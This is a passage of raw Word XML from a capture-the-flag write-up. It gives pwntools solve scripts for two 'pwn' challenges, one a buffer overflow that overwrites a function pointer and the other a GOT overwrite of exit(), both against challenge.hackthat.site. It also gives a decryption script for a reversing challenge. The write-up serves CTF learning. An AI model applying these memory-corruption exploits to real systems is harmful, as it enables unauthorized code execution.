          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r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2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>startExploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2414E6" w14:textId="469D9908" w:rsidR="002B2713" w:rsidRPr="002B2713" w:rsidRDefault="002B27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2719931"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">320. </w:t>
      </w:r>
      <w:r w:rsidRPr="00086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>})();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773E6C82" w14:textId="77777777" w:rsidR="002B2713" w:rsidRDefault="002B2713" w:rsidP="00595F42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09304692" w14:textId="14F19121" w:rsidR="00595F42" w:rsidRDefault="00595F42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</w:p>
    <w:p w14:paraId="44DFD24C" w14:textId="5FD8548B" w:rsidR="0018145A" w:rsidRDefault="00C05876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21" w:name="_Toc203244069"/>
      <w:r w:rsidRPr="00C05876">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pwn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="546ABCAC" w14:textId="77777777" w:rsidR="00BB4E17" w:rsidRPr="00BB4E17" w:rsidRDefault="00BB4E17" w:rsidP="00BB4E17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59937FE1" w14:textId="11084811" w:rsidR="0018145A" w:rsidRDefault="0084646D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2" w:name="_Toc203244070"/>
      <w:r w:rsidRPr="0084646D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Log Recorder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1DC80B35" w14:textId="4B986EE3" w:rsidR="008C03D5" w:rsidRPr="008C03D5" w:rsidRDefault="008C03D5" w:rsidP="008C03D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C03D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C36FB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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C03D5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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="22F5F3C2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2.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0951246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3.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# Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EAD522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4.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elf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context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binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ELF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'./log-recorder'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8FF3AB1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5.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context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terminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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tmux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splitw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'-h'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627B5AC3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6.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3155E01B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7.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Remote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4683298D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8.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HOST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challenge.hackthat.site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</w:p>
    <w:p w14:paraId="30DDD37A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 9.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PORT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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>38714</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906AD36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10.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02FCBCF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11.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# io = process(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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elf.path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)  # Local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA79D9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12.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io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remote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HOST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PORT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# Remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1155C4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13.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3143B89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14.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Resolve the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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emergency_broadcast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A3CD003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15.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emergency_broadcast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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elf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symbols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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emergency_broadcast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2A04C361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16.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log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success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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"emergency_broadcast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: {hex(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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emergency_broadcast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)}"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3C8343C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17.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288AD07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18.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# Step 1: Send dummy log entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5062A71B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19.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io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sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"Enter log entry: "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"A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3B18E2D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20.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DA83D3E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21.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# Step 2: Overflow and overwrite function pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A427F1E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22.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payload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"B</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x18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p64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emergency_broadcast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41364A9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23.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io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sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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8C03D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Enter data: "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payload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7097B2B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24. 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1C6D6F1" w14:textId="77777777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25. </w:t>
      </w:r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Step 3: Get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>interactive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C03D5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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA24158" w14:textId="710DF859" w:rsidR="008C03D5" w:rsidRPr="008C03D5" w:rsidRDefault="008C03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249738"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C03D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">26. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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io</w:t>
      </w:r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8C03D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C03D5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60427D4B" w14:textId="77777777" w:rsidR="003C0D73" w:rsidRDefault="003C0D73" w:rsidP="00BB4E17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D3EC19" w14:textId="251636D6" w:rsidR="008C03D5" w:rsidRDefault="00BB4E17" w:rsidP="00BB4E17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4E17">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3733B64C" wp14:editId="0879AFFF">
            <wp:extent cx="5227019" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1739182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82753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4089" cy="27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C2BA" w14:textId="77777777" w:rsidR="008C03D5" w:rsidRPr="00BB4E17" w:rsidRDefault="008C03D5" w:rsidP="00BB4E17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7697AE7C" w14:textId="436B4D8D" w:rsidR="00C05876" w:rsidRDefault="0084646D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3" w:name="_Toc203244071"/>
      <w:r w:rsidRPr="0084646D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Station </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084646D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maintenace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25DE7907" w14:textId="41ED16A6" w:rsidR="003C0D73" w:rsidRPr="003C0D73" w:rsidRDefault="003C0D73" w:rsidP="003C0D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDA97B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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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C0D73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</w:p>
    <w:p w14:paraId="3CBBBF0E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2. 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099D612B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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Connect to the remote server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A5635E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4. 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remote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C0D73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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>challenge.hackthat.site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'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C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>53234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4E2088E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5. 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E6F0FB8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6. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAE169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7. 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emergency_override</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x401284</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D662B46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8. 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exit_got</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x404050</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396E3C4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 9. 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EAC86AF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10. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># First send the value to write (0x401284 in little-endian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7AF0E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11. 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p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send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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p32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emergency_override</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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30C390DE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12. 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99953E3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13. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Then send the address to write to (0x404050 as a string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3410FE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14. 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p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sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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str</w:t>
      </w:r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exit_got</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7CBED5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15. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73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4EB1D40F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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">16. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73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Now when the program tries to call exit(), it will call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emergency_override</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C0D73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instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172125C2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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">17. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB242F0" w14:textId="77777777" w:rsidR="003C0D73" w:rsidRPr="003C0D73" w:rsidRDefault="003C0D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4389485"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">18. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BC6C9" w14:textId="77777777" w:rsidR="003C0D73" w:rsidRDefault="003C0D73" w:rsidP="003C0D73">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAD14D1" w14:textId="65BCD73F" w:rsidR="003C0D73" w:rsidRPr="003C0D73" w:rsidRDefault="003C0D73" w:rsidP="003C0D73">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0D73">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="189A84F9" wp14:editId="1A95B83A">
            <wp:extent cx="5274310" cy="2820035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19681856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85693" name="Picture 1" descr="A screen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85E8" w14:textId="77777777" w:rsidR="003C0D73" w:rsidRDefault="003C0D73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412A6D7A" w14:textId="7CC94755" w:rsidR="0018145A" w:rsidRDefault="00C05876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24" w:name="_Toc203244072"/>
      <w:r w:rsidRPr="00C05876">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0332E935" w14:textId="77777777" w:rsidR="00BB4E17" w:rsidRPr="00BB4E17" w:rsidRDefault="00BB4E17" w:rsidP="00BB4E17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B6BC10" w14:textId="34CC856F" w:rsidR="0018145A" w:rsidRDefault="00634119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5" w:name="_Toc203244073"/>
      <w:r w:rsidRPr="00634119">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anti-tricks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="212FC8ED" w14:textId="724A9986" w:rsidR="00A81F26" w:rsidRPr="00AE657E" w:rsidRDefault="00AE657E" w:rsidP="00A81F2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Get the bytes from the binary and ask Ai to create a script. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15353F50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1. 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encrypted_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="36CAA021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2.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0x59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0x53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0x8B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0x9A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0x72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0x8B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0x3D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0x99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166DD115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3.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0x36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0x31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0x52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0xE6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0x88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0x6C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0xB9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0xEE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0DFAC3DC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4.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0xA3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0x4A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0xB6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0x92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0x97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0x98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0xD7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0xB4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68388F5C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5.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0x32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0x90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0xC6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0x68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0x4F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0xDA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0x76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0x86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5CE09E5A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6.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0xBD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0x7B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0xB5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0x67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0x77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027CC0C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7.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01CBAAAD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8.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D5F58CE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 9.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n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37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDECC40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10.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data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list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encrypted_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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74E95ED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11.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CDAADC5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12. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE657E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C491E09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13.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6C11ECF9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14.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j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</w:p>
    <w:p w14:paraId="06BD0505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15.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B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j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1C764E56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16.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temp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A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0xFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7F198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17.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k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1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</w:p>
    <w:p w14:paraId="22EBF81D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18.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k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519A243C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19.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data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temp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&amp;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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D03E1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20.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6E3A8416" w14:textId="77777777" w:rsidR="00AE657E" w:rsidRPr="00AE657E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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">21. 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flag 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AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>join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chr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E657E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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE657E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E657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AE657E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12D0BC67" w14:textId="20531442" w:rsidR="00AE657E" w:rsidRPr="00277289" w:rsidRDefault="00AE6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752118"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">22. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE657E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Pr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE657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E657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE657E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D72B38D" w14:textId="77777777" w:rsidR="005B371C" w:rsidRDefault="005B371C" w:rsidP="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D6D407" w14:textId="14773D2D" w:rsidR="00A81F26" w:rsidRPr="005B371C" w:rsidRDefault="005B371C" w:rsidP="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B371C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E632D4" w14:textId="781E92D4" w:rsidR="00277289" w:rsidRDefault="00277289" w:rsidP="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00277289">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F3CBD9" wp14:editId="6EE00EFC">
            <wp:extent cx="4448796" cy="457264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
